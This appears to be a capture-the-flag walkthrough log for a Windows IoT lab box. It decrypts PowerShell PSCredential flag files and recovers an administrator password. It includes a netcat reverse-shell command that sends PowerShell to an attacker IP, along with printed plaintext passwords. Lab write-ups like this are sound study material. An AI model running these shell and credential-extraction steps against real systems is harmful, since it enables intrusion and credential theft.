5 cracking user.txt | root.txt
# to decrypt user.txt we need to act as the app user, which takes app's password; we have app:mesh5143
PS C:\data\users\app> more user.txt
more user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">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</SS>
</Props>
</Obj>
</Objs>
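# this is XML: a PowerShell CLIXML serialization of a PSCredential object; the Password element (SS) is an encrypted SecureString, not a hash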
# looking up 'system.management.automation.pscredential decrypt password'
https://www.travisgan.com/2015/06/powershell-password-encryption.html
| Decrypt encrypted password in a file using Import-Clixml (xml file)
PS C:\data\users\app> $UserCred = Import-Clixml -Path c:\data\users\app\user.txt
$UserCred = Import-Clixml -Path c:\data\users\app\user.txt
Import-Clixml : Error occurred during a cryptographic operation.
At line:1 char:13
+ $UserCred = Import-Clixml -Path c:\data\users\app\user.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
Exception
+ FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
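# Import-Clixml relies on Windows DPAPI for the SecureString, so it only decrypts in a session running as the user who exported it on that machine; this shell is (apparently) not running as that user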
# getting reverse shell from http://10.10.10.204:8080/#Run%20command
c:\inetput\wwwwroot\nc.exe -e powershell.exe 10.10.16.7 7070
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49684
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> $env:UserName
$env:UserName
app
PS C:\windows\system32> $env:UserDomain
$env:ComputerName
$env:UserDomain
OMNI
PS C:\windows\system32> $env:ComputerName
omni
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
# cracking user.txt
PS C:\windows\system32> $UserCred = Import-Clixml -Path C:\data\Users\app\user.txt
$UserCred = Import-Clixml -Path C:\data\Users\app\user.txt
# this creates a Credential Object
PS C:\windows\system32> $UserCred
UserName Password
-------- --------
flag System.Security.SecureString
# to decrypt it
PS C:\windows\system32> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
7cfd50f6bc34db3204898f1505ad9d70
# decrypting root.txt didn't work: as app we are not administrator and cannot even read the file (access denied)
PS C:\data\users\app> $UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
$UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
Import-Clixml : Access to the path 'C:\data\Users\administrator\root.txt' is
denied.
At line:1 char:13
+ $UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OpenError: (:) [Import-Clixml], UnauthorizedAcce
ssException
+ FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.Im
portClixmlCommand
# found interesting files in app's directory
PS C:\data\users\app> dir
Directory: C:\data\users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\data\users\app> more hardening.txt
more hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
PS C:\data\users\app> cat iot-admin.xml
cat iot-admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">omni\administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27</SS>
</Props>
</Obj>
</Objs>
PS C:\data\users\app> $UserCred = Import-Clixml -Path C:\data\Users\app\iot-admin.xml
$UserCred = Import-Clixml -Path C:\data\Users\app\iot-admin.xml
PS C:\data\users\app> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
_1nt3rn37ofTh1nGz
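# iot-admin.xml decrypted in the app session, so the administrator credential was exported under app's own DPAPI key: any process running as app can recover it
# we cannot use it over SSH: per hardening.txt the administrator account was removed from the "Ssh Users" group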
# looking at the username for the first shell we got
PS C:\data\users\app> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
NT AUTHORITY\SYSTEM
# cannot use it here either
# trying administrator:_1nt3rn37ofTh1nGz on IOT Device Portal
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49685
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
# trying a different method to get the root flag: building the credential object by hand, now that the shell runs as OMNI\Administrator
# Rebuild the PSCredential by hand instead of loading it with Import-Clixml.
$username = "omni\administrator"
# ConvertTo-SecureString with no -Key/-SecureKey decrypts the string with Windows DPAPI,
# so this only succeeds in a session running as the account that encrypted it.
# NOTE(review): the string is presumably the Password value taken from root.txt -- confirm.
$password = "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" |convertto-securestring
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
# GetNetworkCredential() exposes the password in plaintext; fl (Format-List) prints each property on its own line.
$cred.GetNetworkCredential() | fl
PS C:\data\users\administrator> $cred.GetNetworkCredential() | fl
$cred.GetNetworkCredential() | fl
UserName : administrator
Password : 5dbdce5569e2c4708617c0ce6e9bf11d
Domain : omni